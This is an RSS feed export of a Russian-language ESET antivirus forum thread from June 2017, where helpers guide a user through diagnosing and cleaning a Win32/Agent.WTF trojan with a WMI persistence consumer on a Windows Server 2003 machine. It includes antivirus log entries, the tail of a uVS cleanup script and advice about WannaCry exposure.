delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.24.15&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.165&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.22.3&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.29.1&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.21.111&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.28.15&#92;PSUSER.DLL
delref %SystemDrive%&#92;DOCUMENTS AND SETTINGS&#92;ADMINISTRATOR&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;GOOGLE&#92;UPDATE&#92;1.3.22.5&#92;PSUSER.DLL
;-------------------------------------------------------------

restart
</pre>
=============
<br />перезагрузка, пишем о старых и новых проблемах.<br />------------<br />далее,<br />сделайте дополнительно быструю проверку системы в малваребайт<br /><noindex><a href="http://forum.esetnod32.ru/forum9/topic10688/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic10688/</a></noindex> <br />
			<i>09.06.2017 15:27:23, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99399/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99399/</guid>
			<pubDate>Fri, 09 Jun 2017 15:27:23 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99398/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Вот ссылка на полный образ: <br /><br /><noindex><a href="https://yadi.sk/d/8PzI8dmW3JyJxh" target="_blank" rel="nofollow">https://yadi.sk/d/8PzI8dmW3JyJxh</a></noindex> <br />
			<i>09.06.2017 15:23:00, Андрей Пахомов.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99398/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99398/</guid>
			<pubDate>Fri, 09 Jun 2017 15:23:00 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99396/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			RP55,<br />подождем образ, из него будет все понятно. <br />
			<i>09.06.2017 14:35:27, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99396/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99396/</guid>
			<pubDate>Fri, 09 Jun 2017 14:35:27 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99393/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Судя по всему здесь должна быть запись в WMI <br />
			<i>09.06.2017 13:41:13, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99393/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99393/</guid>
			<pubDate>Fri, 09 Jun 2017 13:41:13 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99392/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Андрей,<br />добавьте образ автозапуска системы в uVS.<br />(инструкция как это сделать в моей подписи)<br />------<br />+<br />вопрос:<br />сервер 2003 доступен из внешней сети? <br />если да, то надо подумать о безопасности сервера, не ровен час и WannaCry может прилететь, если порты открыты во внешнюю сеть. <br />
			<i>09.06.2017 11:27:19, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99392/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99392/</guid>
			<pubDate>Fri, 09 Jun 2017 11:27:19 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic14074/message99391/">Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;</a></b> <i>ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Как видим, троян и процессы, её запускающие, не удаляются. В планировщике появилось 2 новых задания. В автозапуске 2 новых процесса. Как понял, троян появился только-только. Первые упоминания с 1 июня в сети. НОД пока что только обнаруживает и удаляет создаваемый исполняемый файл. <br /><br />WinServ2003, NOD32 File Security <br /><br /><table class="forum-spoiler"><thead onclick="if (this.nextSibling.style.display=='none') { this.nextSibling.style.display=''; BX.addClass(this, 'forum-spoiler-head-open'); } else { this.nextSibling.style.display='none'; BX.removeClass(this, 'forum-spoiler-head-open'); } BX.onCustomEvent('BX.Forum.Spoiler:toggle', [{node: this}]); event.stopPropagation();"><tr><th><div>Скрытый текст</div></th></tr></thead><tbody class="forum-spoiler" style="display:none;"><tr><td>08.06.2017 18:36:14;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;<br />08.06.2017 15:36:13;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа<br />08.06.2017 11:36:15;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;<br />08.06.2017 7:36:11;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;<br />08.06.2017 1:36:10;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;<br />07.06.2017 22:35:10;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;<br />07.06.2017 18:35:08;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;<br />07.06.2017 15:35:32;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;<br />07.06.2017 12:39:11;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;<br />07.06.2017 12:37:09;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;<br />07.06.2017 12:37:07;Модуль сканирования файлов, исполняемых при запуске системы;неизвестно;Startup;Win32/Agent.WTF троянская программа;содержит зараженные файлы<br />07.06.2017 12:35:08;Модуль сканирования файлов, исполняемых при запуске системы;файл;c:\windows\debug\item.dat;Win32/Agent.WTF троянская программа</td></tr></tbody></table> <br />
			<i>09.06.2017 11:19:02, Андрей Пахомов.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic14074/message99391/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic14074/message99391/</guid>
			<pubDate>Fri, 09 Jun 2017 11:19:02 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
	</channel>
</rss>
